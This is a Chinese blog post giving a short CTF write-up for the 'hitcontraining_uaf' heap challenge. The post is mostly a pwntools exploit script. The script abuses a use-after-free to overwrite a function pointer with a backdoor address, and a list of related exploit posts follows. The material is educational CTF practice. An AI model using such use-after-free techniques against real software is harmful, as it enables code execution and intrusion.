hitcontraining_uaf[use after free]

系统管理员 2023-02-22 08:27 128阅读 0赞

在这里插入图片描述
比较简单，直接留了后门！
exp

from pwn import *
context.log_level = 'debug'
def pause_debug():
    log.info(proc.pidof(p))
    pause()
def add_note(size, context):
    p.sendlineafter('choice :', str(1))
    p.sendlineafter('size :', str(size))
    p.sendafter('Content :', context)
def delete_note(idx):
    p.sendlineafter('choice :', str(2))
    p.sendlineafter('Index :', str(idx))
def print_note(idx):
    p.sendlineafter('choice :', str(3))
    p.sendlineafter('Index :', str(idx))
proc_name = './hacknote'
p = process(proc_name)
# p = remote('node3.buuoj.cn', 27556) 
elf = ELF(proc_name)
magic_addr = elf.sym['magic']
add_note(0x16, b'a') # 0 
add_note(0x16, b'a') # 1 
delete_note(0)
delete_note(1)
add_note(0x8, p32(magic_addr)) # 2 0
print_note(0)
p.interactive()

在这里插入图片描述

发表评论取消回复

表情：

评论列表（有 0 条评论，128人围观）

还没有评论，来说两句吧...

相关阅读

相关解决to the cache because there was insufficient free space available after evict

目录解决 "to the cache because there was insufficient free space available after eviction"

骑猪看日落/ 2023年10月17日 09:04/ 0 赞/ 173 阅读

相关 free()

c语言中经常需要给指针变量分配内存空间，需要用到一组函数： malloc（）和free（）使用的时候需要包含头文件stdlib.h malloc（）比较好理解，主

╰半夏微凉°/ 2023年06月04日 13:54/ 0 赞/ 118 阅读

相关 ciscn_2019_n_3[use after free]

![在这里插入图片描述][2020070523171814.png] ![在这里插入图片描述][20200705231739155.png] exp from

￡神魔★判官ぃ/ 2023年02月23日 07:51/ 0 赞/ 65 阅读

相关 hitcontraining_uaf[use after free]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

系统管理员/ 2023年02月22日 08:27/ 0 赞/ 129 阅读

相关 [BJDCTF 2nd]ydsneedgirlfriend2[use after free]

![在这里插入图片描述][20200626171146938.png] 有符号表，而且直接留了后门！ ![在这里插入图片描述][watermark_type_ZmFuZ

分手后的思念是犯贱/ 2023年02月20日 12:09/ 0 赞/ 94 阅读

相关 uaf漏洞利用、use after free

UAF学习–原理及利用： [https://www.cnblogs.com/alert123/p/4918041.html][https_www.cnblogs.com_a

迷南。/ 2022年12月30日 07:47/ 0 赞/ 198 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

悠悠/ 2022年09月14日 08:52/ 0 赞/ 118 阅读

相关 Fastbin 堆溢出 Use After Free

shell 地址 ![1][] -- coding: utf-8 -- from pwn import elf = ELF('./f

爱被打了一巴掌/ 2022年08月28日 11:00/ 0 赞/ 113 阅读

相关 because there was insufficient free space available after evicting expired cache entries

tomcat8启动时报一下错误 ![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLm

r囧r小猫/ 2021年10月01日 07:48/ 0 赞/ 741 阅读

相关 Free

Free无论是译作“自由”还是“免费”对于使用者来说似乎都有好处，但当自己处于开发者或开发厂商的角度，可能就是“双重标准”了，毕竟没有几个人能像Linus那样Just F...

小灰灰/ 2021年01月08日 14:04/ 0 赞/ 560 阅读